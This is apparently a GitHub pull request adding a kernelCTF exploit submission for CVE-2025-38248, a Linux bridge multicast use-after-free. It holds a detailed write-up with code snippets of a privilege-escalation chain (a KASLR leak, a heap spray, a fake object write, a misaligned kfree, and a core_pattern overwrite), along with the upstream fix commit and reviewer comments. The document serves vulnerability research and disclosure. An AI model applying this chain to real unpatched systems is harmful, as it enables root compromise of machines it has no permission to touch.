kernelctf: add CVE-2025-38248_cos #327
Open
Varde7918 wants to merge 1 commit into google:master from Varde7918:master
127 changes: 127 additions & 0 deletions
pocs/linux/kernelctf/CVE-2025-38248_cos/docs/exploit.md
| Original file line number | Diff line number | Diff line change |
|---|---|---|
| @@ -0,0 +1,127 @@ | ||
| # CVE-2025-38248 | ||
|
|
||
| ## Exploit Primitives | ||
|
|
||
| - **Vulnerable object**: `net_bridge_port` (`kmalloc-1k`) | ||
| - **Primitive chain**: UAF → controlled `hlist` write → `msg_msg->security` corruption → misaligned `kfree` → USMA privilege escalation | ||
|
|
||
| ## Vulnerability Overview | ||
|
|
||
| The root cause is that `br_multicast_port_ctx_deinit()` ([br_multicast.c:2014](../linux/net/bridge/br_multicast.c)) only cancels multicast router timers but does not remove the port from the global multicast router port lists (`ip4_mc_router_list` / `ip6_mc_router_list`): | ||
|
|
||
| ```c | ||
| void br_multicast_port_ctx_deinit(struct net_bridge_mcast_port *pmctx) | ||
| { | ||
| #if IS_ENABLED(CONFIG_IPV6) | ||
| del_timer_sync(&pmctx->ip6_mc_router_timer); | ||
| #endif | ||
| del_timer_sync(&pmctx->ip4_mc_router_timer); | ||
| // Missing: br_ip4_multicast_rport_del(pmctx) | ||
| // Missing: br_ip6_multicast_rport_del(pmctx) | ||
| } | ||
| ``` | ||
|
|
||
| This function is called during port deletion by `br_multicast_del_port()` ([br_multicast.c:2043](../linux/net/bridge/br_multicast.c)). Since it only cancels timers without cleaning up the `hlist` entries, deleting a port that is in permanent multicast router state (`mcast_router=2`) leaves a dangling pointer in the global router list. | ||
|
|
||
| Trigger sequence (corresponding to [exploit.c:829-849](../exploit/cos-121-18867.294.25/exploit.c)): | ||
|
|
||
| ```bash | ||
| # 1. Create a bridge with VLAN filtering and multicast snooping | ||
| ip link add name br1 up type bridge vlan_filtering 1 mcast_snooping 1 | ||
| # 2. Add a port | ||
| ip link add name dummy1 up master br1 type dummy | ||
| # 3. Set as permanent multicast router → ip4_rlist / ip6_rlist added to global router list | ||
| ip link set dev dummy1 type bridge_slave mcast_router 2 | ||
| # 4. Enable per-VLAN multicast snooping → disables base port context, ip4_rlist / ip6_rlist removed from list | ||
| ip link set dev br1 type bridge mcast_vlan_snooping 1 | ||
| # 5. Reset then re-set mcast_router | ||
| # Note: setting directly to 2 would be skipped due to the (pmctx->multicast_router == val) | ||
| # check in br_multicast_set_port_router(), so we must first set to 0 to change the value, | ||
| # then set to 2 to trigger re-addition | ||
| ip link set dev dummy1 type bridge_slave mcast_router 0 | ||
| ip link set dev dummy1 type bridge_slave mcast_router 2 | ||
| # 6. Delete port → br_multicast_port_ctx_deinit() only cancels timers, doesn't clean up list → UAF | ||
| ip link del dev dummy1 | ||
| ``` | ||
|
|
||
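The ordering constraints in the trigger sequence can be sketched as a toy state machine. This is a simplified userspace model, not kernel code: `toy_port`, `toy_set_router`, `toy_enable_vlan_snooping`, `toy_del_port`, and `toy_run` are hypothetical names, and list membership is reduced to a single flag.

```c
#include <stdbool.h>

/* Toy model of one bridge port (hypothetical, for illustration only). */
struct toy_port {
    int  multicast_router; /* 0 = disabled, 2 = permanent router */
    bool on_router_list;   /* stands in for membership in the global hlist */
    bool freed;            /* set once the port object has been released */
};

/* Models the same-value early return described in step 5. */
static void toy_set_router(struct toy_port *p, int val)
{
    if (p->multicast_router == val)
        return;                      /* nothing changes, no re-add */
    p->multicast_router = val;
    p->on_router_list = (val == 2);
}

/* Step 4: the base port context is disabled and the port is unlinked,
 * but the stored multicast_router value is left untouched. */
static void toy_enable_vlan_snooping(struct toy_port *p)
{
    p->on_router_list = false;
}

/* Step 6: the unpatched deinit path only cancels timers, so list
 * membership survives; the patched path unlinks the port first. */
static void toy_del_port(struct toy_port *p, bool patched)
{
    if (patched)
        p->on_router_list = false;
    p->freed = true;
}

/* Runs steps 3-6 and reports whether a freed port is still linked. */
static bool toy_run(bool reset_first, bool patched)
{
    struct toy_port p = { 0, false, false };

    toy_set_router(&p, 2);            /* step 3 */
    toy_enable_vlan_snooping(&p);     /* step 4 */
    if (reset_first)
        toy_set_router(&p, 0);        /* step 5a */
    toy_set_router(&p, 2);            /* step 5b */
    toy_del_port(&p, patched);        /* step 6 */
    return p.freed && p.on_router_list;
}
```

In this model, `toy_run(true, false)` reports a dangling entry, while skipping the reset (`toy_run(false, false)`) or applying the fix (`toy_run(true, true)`) does not.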
| ## Exploitation | ||
|
|
||
| ### 1. Leak and Heap Layout | ||
|
|
||
| Bypass KASLR using the [Entrybleed](https://www.willsroot.io/2022/12/entrybleed.html) prefetch side-channel ([exploit.c:299-455](../exploit/cos-121-18867.294.25/exploit.c)) to leak the kernel base (`leak_kernel_base`) and the direct mapping base (`leak_kheap_base`). | ||
|
|
||
| Then spray `msg_msg` objects (`kmalloc-cg-4k`) across 12 child processes (each with its own IPC namespace), totaling ~1.37 GB. Using the leaked heap base plus an empirical offset `0xa000000`, compute a target address `GUESSED_MSG_ADDR` that is highly likely to contain a `msg_msg` object. The subsequent write target is the `msg_msg->security` field (offset 40) at this address. | ||
|
|
||
| ### 2. Trigger UAF and Reclaim | ||
|
|
||
| The bridge maintains a global multicast router port list (`ip4_mc_router_list`) to ensure multicast packets are forwarded to ports behind multicast routers. Each port is linked into this list via `net_bridge_mcast_port.ip4_rlist` (an `hlist_node`). | ||
|
|
||
| After deleting `dummy1`, its `net_bridge_port` (`kmalloc-1k`) is freed, but the global router list still references its `multicast_ctx.ip4_rlist` and `multicast_ctx.ip6_rlist`. | ||
|
|
||
| Spray a crafted `net_bridge_port` object via netlink (`NETLINK_USERSOCK`) `sk_buff` to reclaim the freed memory ([exploit.c:852-856](../exploit/cos-121-18867.294.25/exploit.c)): | ||
|
|
||
| ```c | ||
| void craft_fake_net_bridge_port(void *fake, void* target_1, void* target_2) { | ||
| struct net_bridge_port *p = (struct net_bridge_port *)fake; | ||
| p->multicast_ctx.ip4_rlist.next = target_1 - 8; // write target 1 | ||
| p->multicast_ctx.ip6_rlist.next = target_2 - 8; // write target 2 (marker) | ||
| p->multicast_ctx.port = 0xffffffffffffffff; // pass null checks | ||
| } | ||
| ``` | ||
|
|
||
| The two write targets are: | ||
| - `target_1` = `&GUESSED_MSG_ADDR->security` (to overwrite `msg_msg->security`) | ||
| - `target_2` = `&GUESSED_MSG_ADDR->mtext[MARKER_OFFSET]` (to write a marker in the message data for victim identification) | ||
|
|
||
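A minimal sketch of how the two write targets could be derived from the leaked direct-mapping base. It assumes the x86_64 `struct msg_msg` layout (48-byte header, `security` at offset 40) and that the message text starts immediately after the header; `msg_msg_model` and the helper names are hypothetical and are not taken from `exploit.c`.

```c
#include <stddef.h>
#include <stdint.h>

/* Userspace mirror of the x86_64 msg_msg header (assumed layout;
 * the kernel definition is authoritative). */
struct msg_msg_model {
    uint64_t m_list_next;  /* offset 0  */
    uint64_t m_list_prev;  /* offset 8  */
    int64_t  m_type;       /* offset 16 */
    uint64_t m_ts;         /* offset 24 */
    uint64_t next;         /* offset 32 */
    uint64_t security;     /* offset 40 */
    /* message text follows the header */
};

#define GUESS_DELTA   0xa000000ULL /* empirical offset from the write-up */
#define MARKER_OFFSET 0x100ULL     /* marker position inside the text */

/* Address that is expected to hold a sprayed msg_msg. */
static uint64_t guessed_msg_addr(uint64_t kheap_base)
{
    return kheap_base + GUESS_DELTA;
}

/* target_1: address of msg_msg->security. */
static uint64_t security_target(uint64_t msg)
{
    return msg + offsetof(struct msg_msg_model, security);
}

/* target_2: address of the marker inside the message text. */
static uint64_t marker_target(uint64_t msg)
{
    return msg + sizeof(struct msg_msg_model) + MARKER_OFFSET;
}
```

Each value would then have 8 subtracted before being stored in the fake `next` pointer, as `craft_fake_net_bridge_port()` does.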
| ### 3. Controlled Write | ||
|
|
||
| Create `dummy2` and set `mcast_router=2` ([exploit.c:858-864](../exploit/cos-121-18867.294.25/exploit.c)), triggering `br_multicast_add_router()` ([br_multicast.c:3339](../linux/net/bridge/br_multicast.c)) to traverse the router list. When it encounters the dangling node (now occupied by our crafted data), the kernel calls `hlist_add_behind_rcu()` to insert `dummy2`'s node after it: | ||
|
|
||
| ```c | ||
| // include/linux/rculist.h:678 | ||
| static inline void hlist_add_behind_rcu(struct hlist_node *n, | ||
| struct hlist_node *prev) | ||
| { | ||
| n->next = prev->next; // [1] | ||
| WRITE_ONCE(n->pprev, &prev->next); | ||
| rcu_assign_pointer(hlist_next_rcu(prev), n); | ||
| if (n->next) | ||
| WRITE_ONCE(n->next->pprev, &n->next); // [2] | ||
| } | ||
| ``` | ||
|
|
||
| Here `prev` is the crafted node (occupying `dummy1`'s freed `ip4_rlist`), and `n` is `dummy2`'s `ip4_rlist`: | ||
|
|
||
| - `[1]`: We set `prev->next` to `&msg_msg->security - 8`, so `n->next = &msg_msg->security - 8` | ||
| - `[2]`: The address of `n->next->pprev` is `(&msg_msg->security - 8) + offsetof(hlist_node, pprev)` = `&msg_msg->security - 8 + 8` = `&msg_msg->security`. Thus `msg_msg->security` is overwritten with `&n->next`. | ||
|
|
||
| **Result**: `msg_msg->security = &dummy2->multicast_ctx.ip4_rlist.next`, i.e., `dummy2_base + 408`. | ||
|
|
||
| Similarly, the `ip6_rlist` write uses the same mechanism to write a non-zero value at `msg_msg->mtext[MARKER_OFFSET]`, serving as a marker to identify the victim. | ||
|
|
||
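The write at `[2]` can be reproduced in userspace with a plain copy of the list helper. This is a sketch under stated assumptions: `hlist_add_behind_model` drops the RCU and `WRITE_ONCE` annotations, the 48-byte `victim` buffer stands in for a `msg_msg` header with `security` at offset 40, and `demo_controlled_write` is a hypothetical name.

```c
#include <stddef.h>
#include <string.h>

struct hlist_node {
    struct hlist_node *next, **pprev;
};

/* Same stores as hlist_add_behind_rcu(), without the RCU annotations. */
static void hlist_add_behind_model(struct hlist_node *n,
                                   struct hlist_node *prev)
{
    n->next = prev->next;              /* [1] attacker-chosen pointer */
    n->pprev = &prev->next;
    prev->next = n;
    if (n->next)
        n->next->pprev = &n->next;     /* [2] the controlled write */
}

#define SECURITY_OFFSET 40 /* assumed offset of msg_msg->security */

/* Returns 1 if the victim's security slot now holds &fresh.next. */
static int demo_controlled_write(void)
{
    _Alignas(8) unsigned char victim[48] = {0}; /* fake msg_msg header */
    struct hlist_node stale = {0};  /* reclaimed dummy1 node */
    struct hlist_node fresh = {0};  /* dummy2 node being inserted */
    void *stored = NULL;

    /* Point `next` so that the fake node's pprev field lands on security. */
    stale.next = (struct hlist_node *)
        (victim + SECURITY_OFFSET - offsetof(struct hlist_node, pprev));

    hlist_add_behind_model(&fresh, &stale);

    memcpy(&stored, victim + SECURITY_OFFSET, sizeof(stored));
    return stored == (void *)&fresh.next;
}
```

Reading the slot back with `memcpy` keeps the check independent of how the compiler treats the type-punned store.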
| ### 4. Locate Victim msg_msg | ||
|
|
||
| Child processes use the `MSG_COPY` flag to non-destructively read all messages, checking whether offset `MARKER_OFFSET` (0x100) contains a non-zero value ([exploit.c:543-559](../exploit/cos-121-18867.294.25/exploit.c)). The marker written by the `ip6_rlist` write pinpoints exactly which `msg_msg` was hit: | ||
|
|
||
| ```c | ||
| uint64_t *marker = &msgbuf.mtext[MARKER_OFFSET]; | ||
| if (*marker) { | ||
| shared->victim_msg_idx = msg_idx; | ||
| shared->victim_process = process_idx; | ||
| } | ||
| ``` | ||
|
|
||
| ### 5. Misaligned kfree and USMA Privilege Escalation | ||
|
|
||
| After deleting `dummy2`, reclaim its freed memory with `pg_vec` (`AF_PACKET` socket RX ring page pointer arrays, `kmalloc-1k`) ([exploit.c:872-877](../exploit/cos-121-18867.294.25/exploit.c)). | ||
|
|
||
| Then call `msgrcv` to receive the victim message. The kernel calls `kfree(msg->security)` when freeing the `msg_msg`: | ||
|
|
||
| - `msg->security` has been overwritten to `dummy2_base + 408` — this is not an object-aligned address, but a pointer at offset 408 within a `kmalloc-1k` object | ||
| - `kfree` does not validate whether the pointer is aligned to an object start; it places `dummy2_base + 408` directly onto the `kmalloc-1k` freelist | ||
| - Meanwhile, the `pg_vec` at `dummy2_base` is still actively referenced by a `packet_socket` | ||
|
|
||
| This is the core of the **misaligned kfree** technique: the next `kmalloc-1k` allocation returns `dummy2_base + 408`, so the newly allocated buffer starts in the middle of the live `pg_vec`. Spraying 616 bytes (= 1024 - 408, exactly the remainder of the object) of `core_pattern` page addresses via `sk_buff` overwrites the `pg_vec` entries from index 51 (= 408 / 8) onward. | ||
|
|
||
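The overlap arithmetic can be checked with a few lines of C. The constants come from the text above; the 8-byte entry size assumes x86_64, where each `pg_vec` entry is a single pointer, and the helper names are hypothetical.

```c
#define KMALLOC_1K_SIZE   1024u /* size of a kmalloc-1k object */
#define FREED_PTR_OFFSET  408u  /* offset of ip4_rlist.next in the object */
#define PG_VEC_ENTRY_SIZE 8u    /* one pointer per entry (x86_64 assumption) */

/* Bytes of the live pg_vec covered by the misaligned allocation. */
static unsigned overlap_bytes(void)
{
    return KMALLOC_1K_SIZE - FREED_PTR_OFFSET;
}

/* Index of the first pg_vec entry that the spray overwrites. */
static unsigned first_overwritten_index(void)
{
    return FREED_PTR_OFFSET / PG_VEC_ENTRY_SIZE;
}

/* Number of pg_vec entries that fall inside the overlap. */
static unsigned overwritten_entries(void)
{
    return overlap_bytes() / PG_VEC_ENTRY_SIZE;
}
```

Because 408 is a multiple of 8, the misaligned chunk begins exactly on an entry boundary, so no entry is only partially overwritten.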
| Finally, iterate over all `packet_socket`s and `mmap` their ring buffers ([exploit.c:646-667](../exploit/cos-121-18867.294.25/exploit.c)). The corrupted `pg_vec` entries cause the corresponding pages in the `mmap` region to map to the kernel page containing `core_pattern`. Overwrite `core_pattern` with `|/proc/%P/fd/666 %P`. A previously forked child process ([exploit.c:778-783](../exploit/cos-121-18867.294.25/exploit.c)) detects the overwrite and triggers a crash, causing the kernel to execute the exploit binary itself with root privileges to read the flag. | ||
|
|
147 changes: 147 additions & 0 deletions
pocs/linux/kernelctf/CVE-2025-38248_cos/docs/vulnerability.md
| Original file line number | Diff line number | Diff line change |
|---|---|---|
| @@ -0,0 +1,147 @@ | ||
| ## bridge: mcast: Fix use-after-free during router port configuration | ||
| [ Upstream commit 7544f3f5b0b58c396f374d060898b5939da31709 ] | ||
|
|
||
| The bridge maintains a global list of ports behind which a multicast | ||
| router resides. The list is consulted during forwarding to ensure | ||
| multicast packets are forwarded to these ports even if the ports are not | ||
| member in the matching MDB entry. | ||
|
|
||
| When per-VLAN multicast snooping is enabled, the per-port multicast | ||
| context is disabled on each port and the port is removed from the global | ||
| router port list: | ||
|
|
||
| # ip link add name br1 up type bridge vlan_filtering 1 mcast_snooping 1 | ||
|
Collaborator
Could you take another look at the Markdown in this file? Right now "#" is interpreted as a document header. It is probably worth enclosing the shell commands in a fenced code block.
||
| # ip link add name dummy1 up master br1 type dummy | ||
| # ip link set dev dummy1 type bridge_slave mcast_router 2 | ||
| $ bridge -d mdb show | grep router | ||
| router ports on br1: dummy1 | ||
| # ip link set dev br1 type bridge mcast_vlan_snooping 1 | ||
| $ bridge -d mdb show | grep router | ||
|
|
||
| However, the port can be re-added to the global list even when per-VLAN | ||
| multicast snooping is enabled: | ||
|
|
||
| # ip link set dev dummy1 type bridge_slave mcast_router 0 | ||
| # ip link set dev dummy1 type bridge_slave mcast_router 2 | ||
| $ bridge -d mdb show | grep router | ||
| router ports on br1: dummy1 | ||
|
|
||
| Since commit 4b30ae9adb04 ("net: bridge: mcast: re-implement | ||
| br_multicast_{enable, disable}_port functions"), when per-VLAN multicast | ||
| snooping is enabled, multicast disablement on a port will disable the | ||
| per-{port, VLAN} multicast contexts and not the per-port one. As a | ||
| result, a port will remain in the global router port list even after it | ||
| is deleted. This will lead to a use-after-free [1] when the list is | ||
| traversed (when adding a new port to the list, for example): | ||
|
|
||
| # ip link del dev dummy1 | ||
| # ip link add name dummy2 up master br1 type dummy | ||
| # ip link set dev dummy2 type bridge_slave mcast_router 2 | ||
|
|
||
| Similarly, stale entries can also be found in the per-VLAN router port | ||
| list. When per-VLAN multicast snooping is disabled, the per-{port, VLAN} | ||
| contexts are disabled on each port and the port is removed from the | ||
| per-VLAN router port list: | ||
|
|
||
| # ip link add name br1 up type bridge vlan_filtering 1 mcast_snooping 1 mcast_vlan_snooping 1 | ||
| # ip link add name dummy1 up master br1 type dummy | ||
| # bridge vlan add vid 2 dev dummy1 | ||
| # bridge vlan global set vid 2 dev br1 mcast_snooping 1 | ||
| # bridge vlan set vid 2 dev dummy1 mcast_router 2 | ||
| $ bridge vlan global show dev br1 vid 2 | grep router | ||
| router ports: dummy1 | ||
| # ip link set dev br1 type bridge mcast_vlan_snooping 0 | ||
| $ bridge vlan global show dev br1 vid 2 | grep router | ||
|
|
||
| However, the port can be re-added to the per-VLAN list even when | ||
| per-VLAN multicast snooping is disabled: | ||
|
|
||
| # bridge vlan set vid 2 dev dummy1 mcast_router 0 | ||
| # bridge vlan set vid 2 dev dummy1 mcast_router 2 | ||
| $ bridge vlan global show dev br1 vid 2 | grep router | ||
| router ports: dummy1 | ||
|
|
||
| When the VLAN is deleted from the port, the per-{port, VLAN} multicast | ||
| context will not be disabled since multicast snooping is not enabled | ||
| on the VLAN. As a result, the port will remain in the per-VLAN router | ||
| port list even after it is no longer member in the VLAN. This will lead | ||
| to a use-after-free [2] when the list is traversed (when adding a new | ||
| port to the list, for example): | ||
|
|
||
| # ip link add name dummy2 up master br1 type dummy | ||
| # bridge vlan add vid 2 dev dummy2 | ||
| # bridge vlan del vid 2 dev dummy1 | ||
| # bridge vlan set vid 2 dev dummy2 mcast_router 2 | ||
|
|
||
| Fix these issues by removing the port from the relevant (global or | ||
| per-VLAN) router port list in br_multicast_port_ctx_deinit(). The | ||
| function is invoked during port deletion with the per-port multicast | ||
| context and during VLAN deletion with the per-{port, VLAN} multicast | ||
| context. | ||
|
|
||
| Note that deleting the multicast router timer is not enough as it only | ||
| takes care of the temporary multicast router states (1 or 3) and not the | ||
| permanent one (2). | ||
|
|
||
| [1] | ||
| BUG: KASAN: slab-out-of-bounds in br_multicast_add_router.part.0+0x3f1/0x560 | ||
| Write of size 8 at addr ffff888004a67328 by task ip/384 | ||
| [...] | ||
| Call Trace: | ||
| <TASK> | ||
| dump_stack_lvl+0x6f/0xa0 | ||
| print_address_description.constprop.0+0x6f/0x350 | ||
| print_report+0x108/0x205 | ||
| kasan_report+0xdf/0x110 | ||
| br_multicast_add_router.part.0+0x3f1/0x560 | ||
| br_multicast_set_port_router+0x74e/0xac0 | ||
| br_setport+0xa55/0x1870 | ||
| br_port_slave_changelink+0x95/0x120 | ||
| __rtnl_newlink+0x5e8/0xa40 | ||
| rtnl_newlink+0x627/0xb00 | ||
| rtnetlink_rcv_msg+0x6fb/0xb70 | ||
| netlink_rcv_skb+0x11f/0x350 | ||
| netlink_unicast+0x426/0x710 | ||
| netlink_sendmsg+0x75a/0xc20 | ||
| __sock_sendmsg+0xc1/0x150 | ||
| ____sys_sendmsg+0x5aa/0x7b0 | ||
| ___sys_sendmsg+0xfc/0x180 | ||
| __sys_sendmsg+0x124/0x1c0 | ||
| do_syscall_64+0xbb/0x360 | ||
| entry_SYSCALL_64_after_hwframe+0x4b/0x53 | ||
|
|
||
| [2] | ||
| BUG: KASAN: slab-use-after-free in br_multicast_add_router.part.0+0x378/0x560 | ||
| Read of size 8 at addr ffff888009f00840 by task bridge/391 | ||
| [...] | ||
| Call Trace: | ||
| <TASK> | ||
| dump_stack_lvl+0x6f/0xa0 | ||
| print_address_description.constprop.0+0x6f/0x350 | ||
| print_report+0x108/0x205 | ||
| kasan_report+0xdf/0x110 | ||
| br_multicast_add_router.part.0+0x378/0x560 | ||
| br_multicast_set_port_router+0x6f9/0xac0 | ||
| br_vlan_process_options+0x8b6/0x1430 | ||
| br_vlan_rtm_process_one+0x605/0xa30 | ||
| br_vlan_rtm_process+0x396/0x4c0 | ||
| rtnetlink_rcv_msg+0x2f7/0xb70 | ||
| netlink_rcv_skb+0x11f/0x350 | ||
| netlink_unicast+0x426/0x710 | ||
| netlink_sendmsg+0x75a/0xc20 | ||
| __sock_sendmsg+0xc1/0x150 | ||
| ____sys_sendmsg+0x5aa/0x7b0 | ||
| ___sys_sendmsg+0xfc/0x180 | ||
| __sys_sendmsg+0x124/0x1c0 | ||
| do_syscall_64+0xbb/0x360 | ||
| entry_SYSCALL_64_after_hwframe+0x4b/0x53 | ||
|
|
||
| Fixes: 2796d846d74a ("net: bridge: vlan: convert mcast router global option to per-vlan entry") | ||
| Fixes: 4b30ae9adb04 ("net: bridge: mcast: re-implement br_multicast_{enable, disable}_port functions") | ||
| Reported-by: syzbot+7bfa4b72c6a5da128d32@syzkaller.appspotmail.com | ||
| Closes: https://lore.kernel.org/all/684c18bd.a00a0220.279073.000b.GAE@google.com/T/ | ||
| Signed-off-by: Ido Schimmel <idosch@nvidia.com> | ||
| Link: https://patch.msgid.link/20250619182228.1656906-1-idosch@nvidia.com | ||
| Signed-off-by: Jakub Kicinski <kuba@kernel.org> | ||
| Signed-off-by: Sasha Levin <sashal@kernel.org> | ||
|
|
||
13 changes: 13 additions & 0 deletions
pocs/linux/kernelctf/CVE-2025-38248_cos/exploit/cos-121-18867.294.25/Makefile
| Original file line number | Diff line number | Diff line change |
|---|---|---|
| @@ -0,0 +1,13 @@ | ||
| CFLAGS = -static -pthread -s | ||
|
|
||
|
|
||
| exploit: exploit.c | ||
| $(CC) $(CFLAGS) -o $@ $< | ||
|
|
||
| exploit_debug: exploit.c | ||
| $(CC) $(filter-out -s,$(CFLAGS)) -g -o $@ $< | ||
|
|
||
| clean: | ||
| rm -f exploit exploit_debug | ||
|
|
||
| .PHONY: clean |
Binary file added
+794 KB
pocs/linux/kernelctf/CVE-2025-38248_cos/exploit/cos-121-18867.294.25/exploit
Binary file not shown.
The file lacks important information, such as which versions are affected, which capabilities (if any) are needed to exploit the vulnerability, and which configuration options must be enabled. Please check other, already merged exploit PRs to see what the file should contain. For example, https://github.com/google/security-research/blob/master/pocs/linux/kernelctf/CVE-2025-37752_cos/docs/vulnerability.md